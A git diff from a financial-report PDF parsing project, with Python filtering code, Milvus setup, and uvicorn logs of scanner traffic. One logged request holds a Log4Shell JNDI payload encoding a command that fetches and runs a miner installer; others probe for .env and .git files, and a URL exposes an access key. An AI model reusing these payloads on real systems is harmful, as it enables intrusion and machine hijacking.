black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用']
|
||||
# current_period = f'当期:{report_year}年1-6月'
|
||||
# black_array.append(current_period)
|
||||
for black in black_array:
|
||||
|
@ -550,26 +525,26 @@ def check_black_table_list(data):
|
|||
black_meta = black.split(':')[0]
|
||||
black_pdfs = black.split(':')[1].split(',')
|
||||
if any(black_meta in cell for row in data for cell in row):
|
||||
print(data)
|
||||
logger.debug(data)
|
||||
for pdf in black_pdfs:
|
||||
data = [row for row in data if not any(pdf in cell for cell in row)]
|
||||
return data
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
print(len('我是我'))
|
||||
logger.debug(len('我是我'))
|
||||
|
||||
# print(under_non_alpha_ratio('202水电费水电费水电费是的205月'))
|
||||
# logger.debug(under_non_alpha_ratio('202水电费水电费水电费是的205月'))
|
||||
# title = '母公司财务报表主要项目注释'
|
||||
# if len(re.findall('母公司|现金流量表补充', title)) >0 and len(re.findall('项目注释', title)) == 0:
|
||||
# print('1')
|
||||
# logger.debug('1')
|
||||
# else:
|
||||
# print('0')
|
||||
# logger.debug('0')
|
||||
|
||||
# print(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
|
||||
# logger.debug(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
|
||||
# test = '2023年1-12月'
|
||||
# print(get_period_type('上年度本期费用化研发投入'))
|
||||
# print(get_period_type('费用化研发投入本年度'))
|
||||
# logger.debug(get_period_type('上年度本期费用化研发投入'))
|
||||
# logger.debug(get_period_type('费用化研发投入本年度'))
|
||||
# vector_a = embed_with_str('第一季度营业收入')
|
||||
# vector = vector_a.output["embeddings"][0]["embedding"]
|
||||
|
||||
|
@ -577,7 +552,7 @@ if __name__ == '__main__':
|
|||
# vector1 = vector_b.output["embeddings"][0]["embedding"]
|
||||
|
||||
# similarity = cosine_similarity(vector, vector1)
|
||||
# print(f"余弦相似度: {similarity}")
|
||||
# logger.debug(f"余弦相似度: {similarity}")
|
||||
|
||||
# measure_data = [
|
||||
# '1,1,营业收入2023年金额,1003535799.51',
|
||||
|
@ -792,21 +767,14 @@ if __name__ == '__main__':
|
|||
# )
|
||||
# vector_obj = embed_with_str('2023年营业收入')
|
||||
# vector = vector_obj.output["embeddings"][0]["embedding"]
|
||||
# data = [vector]
|
||||
# res = client.search(
|
||||
# collection_name="zzb_measure", # Replace with the actual name of your collection
|
||||
# # Replace with your query vector
|
||||
# data=data,
|
||||
# limit=1, # Max. number of search results to return
|
||||
# search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
|
||||
# output_fields=["measure_name","measure_value"]
|
||||
# )
|
||||
|
||||
# # Convert the output to a formatted JSON string
|
||||
# result = json.dumps(res, indent=4, ensure_ascii=False)
|
||||
# print(result)
|
||||
# vector_b = embed_with_str('营业收入第一季度')
|
||||
# vector1 = vector_b.output["embeddings"][0]["embedding"]
|
||||
|
||||
# similarity = cosine_similarity(vector, vector1)
|
||||
# logger.debug(f"余弦相似度: {similarity}")
|
||||
|
||||
# insert_measure_data(client, measure_data)
|
||||
# text = '营业收入第一季度(1-3月份)'
|
||||
# new_text = re.sub(r'([^)]*)', '',text)
|
||||
# print(new_text)
|
||||
# logger.debug(new_text)
|
||||
|
|
|
@ -0,0 +1,3 @@
|
|||
--2024-12-27 11:22:17-- https://financial-report.obs.cn-east-3.myhuaweicloud.com/upload/file/44b374ac0fe140a2922c360db47335a1.PDF?AccessKeyId=WMBIZTLULUR24OBUIRC4
|
||||
Resolving financial-report.obs.cn-east-3.myhuaweicloud.com (financial-report.obs.cn-east-3.myhuaweicloud.com)... failed: Name or service not known.
|
||||
wget: unable to resolve host address ‘financial-report.obs.cn-east-3.myhuaweicloud.com’
|
|
@ -0,0 +1,14 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<module type="PYTHON_MODULE" version="4">
|
||||
<component name="NewModuleRootManager">
|
||||
<content url="file://$MODULE_DIR$">
|
||||
<excludeFolder url="file://$MODULE_DIR$/venv" />
|
||||
</content>
|
||||
<orderEntry type="jdk" jdkName="Python 3.8" jdkType="Python SDK" />
|
||||
<orderEntry type="sourceFolder" forTests="false" />
|
||||
</component>
|
||||
<component name="PyDocumentationSettings">
|
||||
<option name="format" value="PLAIN" />
|
||||
<option name="myDocStringFormat" value="Plain" />
|
||||
</component>
|
||||
</module>
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -27,43 +27,4 @@ def create_partition_by_hour(current_hour):
|
|||
pre_partition = collection.partition(name)
|
||||
pre_partition.release()
|
||||
collection.drop_partition(name)
|
||||
print(f"Partition '{name}' deleted.")
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
from pymilvus import connections, CollectionSchema, Collection,utility,FieldSchema,DataType
|
||||
# 连接到 B 服务器上的 Milvus
|
||||
# connections.connect(host='124.70.129.232', port='19530')# 测试服务器
|
||||
connections.connect(host='127.0.0.1', port='19530')# 测试服务器
|
||||
# # 获取集合列表
|
||||
utility.drop_collection("pdf_measure_v4")
|
||||
|
||||
# 定义字段
|
||||
fields = [
|
||||
FieldSchema(name="id", dtype=DataType.INT64, is_primary=True, auto_id=True),
|
||||
FieldSchema(name="vector", dtype=DataType.FLOAT_VECTOR, dim=1536),
|
||||
FieldSchema(name="table_num", dtype=DataType.INT16),
|
||||
FieldSchema(name="table_index", dtype=DataType.INT16),
|
||||
FieldSchema(name="measure_name", dtype=DataType.VARCHAR, max_length=200),
|
||||
FieldSchema(name="measure_value", dtype=DataType.VARCHAR, max_length=200),
|
||||
FieldSchema(name="file_id", dtype=DataType.VARCHAR, max_length=200),
|
||||
FieldSchema(name="measure_unit", dtype=DataType.VARCHAR, max_length=200)
|
||||
]
|
||||
|
||||
# 定义集合的 schema
|
||||
schema = CollectionSchema(fields=fields, description="My Milvus collection")
|
||||
|
||||
# 创建集合
|
||||
collection = Collection(name="pdf_measure_v4", schema=schema)
|
||||
|
||||
collection = Collection("pdf_measure_v4")
|
||||
index_params = {
|
||||
"index_type": "IVF_FLAT",
|
||||
"metric_type": "COSINE",
|
||||
"params": {"nlist": 128}
|
||||
}
|
||||
collection.create_index(field_name="vector", index_params=index_params)
|
||||
collection.load()
|
||||
print(f"Partition '{name}' deleted.")
|
|
@ -0,0 +1,5 @@
|
|||
nohup: ignoring input
|
||||
INFO: Started server process [1654611]
|
||||
INFO: Waiting for application startup.
|
||||
INFO: Application startup complete.
|
||||
INFO: Uvicorn running on http://0.0.0.0:8001 (Press CTRL+C to quit)
|
|
@ -0,0 +1,521 @@
|
|||
nohup: ignoring input
|
||||
INFO: Started server process [2255841]
|
||||
INFO: Waiting for application startup.
|
||||
INFO: Application startup complete.
|
||||
INFO: Uvicorn running on http://0.0.0.0:8001 (Press CTRL+C to quit)
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 80.66.83.46:32838 - "CONNECT 80.66.83.46%3A80 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 64.62.197.53:3545 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.50:35771 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.47:13919 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.48:21545 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.191.126.248:57546 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 1.92.159.135:33735 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 1.92.159.135:57283 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 111.7.96.172:12566 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 123.249.108.188:15282 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.191.126.248:36188 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 95.214.53.211:49760 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 13.58.97.162:57062 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.191.126.248:49978 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 39.105.14.55:35848 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 39.105.14.55:35238 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.60:32883 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.62:35677 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.63:36665 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.64:2695 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 154.212.141.167:39308 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.216.140.186:50780 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
|
||||
INFO: 206.168.34.197:34136 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 206.168.34.197:34148 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 123.249.108.188:18897 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 204.188.228.42:37138 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 87.236.176.70:45919 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 74.82.47.5:59374 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 74.82.47.5:36568 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 74.82.47.5:22818 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 74.82.47.5:22834 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 185.216.140.186:39202 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 113.141.84.160:46762 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 172.206.143.215:52262 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 65.49.20.66:32032 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.66:11880 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.66:8166 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.66:8170 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 125.36.252.182:35210 - "HEAD http%3A//110.242.68.4/ HTTP/1.1" 404 Not Found
|
||||
INFO: 183.93.85.22:45035 - "GET http%3A//www.wujieliulan.com/ HTTP/1.1" 404 Not Found
|
||||
INFO: 183.93.85.22:63911 - "CONNECT www.baidu.com%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 183.93.85.22:56321 - "GET http%3A//www.rfa.org/english/ HTTP/1.1" 404 Not Found
|
||||
INFO: 183.93.85.22:49588 - "CONNECT cn.bing.com%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 183.93.85.22:20626 - "GET http%3A//dongtaiwang.com/ HTTP/1.1" 404 Not Found
|
||||
INFO: 183.93.85.22:18861 - "CONNECT www.voanews.com%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 121.29.178.42:41815 - "GET http%3A//www.epochtimes.com/ HTTP/1.1" 404 Not Found
|
||||
INFO: 121.29.178.42:58806 - "CONNECT www.so.com%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 121.29.178.42:22055 - "GET http%3A//www.soso.com/ HTTP/1.1" 404 Not Found
|
||||
INFO: 121.29.178.42:15541 - "GET http%3A//www.minghui.org/ HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 206.168.34.36:50306 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 206.168.34.36:50314 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.191.126.248:59964 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 223.113.128.158:50058 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.191.126.248:35796 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 52.81.237.92:54862 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 52.81.237.92:54864 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 52.81.237.92:54884 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
|
||||
INFO: 52.81.237.92:54874 - "GET /robots.txt HTTP/1.1" 404 Not Found
|
||||
INFO: 162.243.8.38:44506 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 64.62.197.214:16647 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.223:22653 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.221:26687 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.214:2107 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 124.70.63.89:57249 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 124.70.63.89:18564 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 221.3.24.185:64663 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 106.75.189.197:40002 - "POST /token HTTP/1.1" 404 Not Found
|
||||
INFO: 185.191.126.248:39220 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 113.141.85.252:58036 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 103.203.58.4:47208 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 2.57.122.207:42128 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 2.57.122.207:42128 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 162.142.125.37:35894 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 162.142.125.37:35908 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 206.168.34.121:38726 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 206.168.34.121:38738 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 206.168.34.42:34776 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 206.168.34.42:54344 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 87.236.176.211:56241 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 64.62.156.14:6981 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.21:38001 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.17:47719 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.19:24409 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 31.13.224.51:36814 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 120.46.16.109:30384 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 120.46.16.109:16930 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 123.249.108.188:43694 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.191.126.248:56286 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.139.70:59608 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.139.70:54880 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.139.70:54884 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.139.70:65464 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.191.126.248:34390 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.216.140.186:55756 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
|
||||
INFO: 124.70.90.23:52356 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 36.41.68.61:44290 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 13.64.193.117:47282 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.216.140.186:59794 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
|
||||
INFO: 162.142.125.33:47956 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 162.142.125.33:47972 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 159.65.236.96:54972 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 123.145.33.216:17362 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 5.135.58.198:44397 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 178.32.72.218:47617 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 60.191.20.210:43456 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 184.105.247.195:24312 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.247.195:18346 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.247.195:18362 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.247.195:18378 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 80.75.212.9:36590 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.191.126.248:33458 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.91.127.9:43792 - "GET /t%28%27%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%24%7Benv%3ANaN%3A-%3A%7D%24%7Benv%3ANaN%3A-l%7Ddap%24%7Benv%3ANaN%3A-%3A%7D//89.34.230.11%3A3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27%29 HTTP/1.1" 404 Not Found
|
||||
INFO: 185.91.127.43:34340 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.191.126.248:47662 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 1.94.195.230:27084 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 1.94.195.230:52315 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.216.140.186:37086 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
|
||||
INFO: 87.236.176.221:52211 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 206.168.34.206:59698 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 206.168.34.206:59708 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 80.75.212.9:43956 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.80:52199 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.81:37671 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.89:8367 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.81:27717 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 152.32.135.214:45910 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 152.32.135.214:39902 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 152.32.135.214:39908 - "GET /robots.txt HTTP/1.1" 404 Not Found
|
||||
INFO: 152.32.135.214:39912 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.191.126.248:51164 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 120.46.16.109:25305 - "HEAD /sitemap.xml HTTP/1.1" 404 Not Found
|
||||
INFO: 120.46.16.109:57264 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 154.212.141.151:56762 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.191.126.248:44644 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 64.62.197.165:56651 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.152:10483 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.160:50057 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.161:40701 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 138.197.191.87:39360 - "GET / HTTP/1.1" 404 Not Found
|
||||
ERROR: Exception in ASGI application
|
||||
Traceback (most recent call last):
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/protocols/http/h11_impl.py", line 407, in run_asgi
|
||||
result = await app( # type: ignore[func-returns-value]
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/middleware/proxy_headers.py", line 69, in __call__
|
||||
return await self.app(scope, receive, send)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/fastapi/applications.py", line 1054, in __call__
|
||||
await super().__call__(scope, receive, send)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/applications.py", line 123, in __call__
|
||||
await self.middleware_stack(scope, receive, send)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 186, in __call__
|
||||
raise exc
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 164, in __call__
|
||||
await self.app(scope, receive, _send)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/exceptions.py", line 65, in __call__
|
||||
await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/_exception_handler.py", line 78, in wrapped_app
|
||||
await response(scope, receive, sender)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/responses.py", line 152, in __call__
|
||||
await send(
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/_exception_handler.py", line 50, in sender
|
||||
await send(message)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 161, in _send
|
||||
await send(message)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/protocols/http/h11_impl.py", line 489, in send
|
||||
output = self.conn.send(event=response)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 512, in send
|
||||
data_list = self.send_with_data_passthrough(event)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 537, in send_with_data_passthrough
|
||||
self._process_event(self.our_role, event)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 272, in _process_event
|
||||
self._cstate.process_event(role, type(event), server_switch_event)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_state.py", line 293, in process_event
|
||||
self._fire_event_triggered_transitions(role, _event_type)
|
||||
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_state.py", line 311, in _fire_event_triggered_transitions
|
||||
raise LocalProtocolError(
|
||||
h11._util.LocalProtocolError: can't handle event type Response when role=SERVER and state=MUST_CLOSE
|
||||
INFO: 138.197.191.87:39362 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:49354 - "GET /server HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:49358 - "GET /version HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:49374 - "GET /.vscode/sftp.json HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:49388 - "GET /about HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:49394 - "GET /debug/default/view?panel=config HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:49404 - "GET /v2/_catalog HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:49416 - "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:49430 - "GET /server-status HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:49442 - "GET /_all_dbs HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:49446 - "GET /.DS_Store HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:36216 - "GET /.env HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:36226 - "GET /.git/config HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:36240 - "GET /s/330313e20363e24393e213/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 Not Found
|
||||
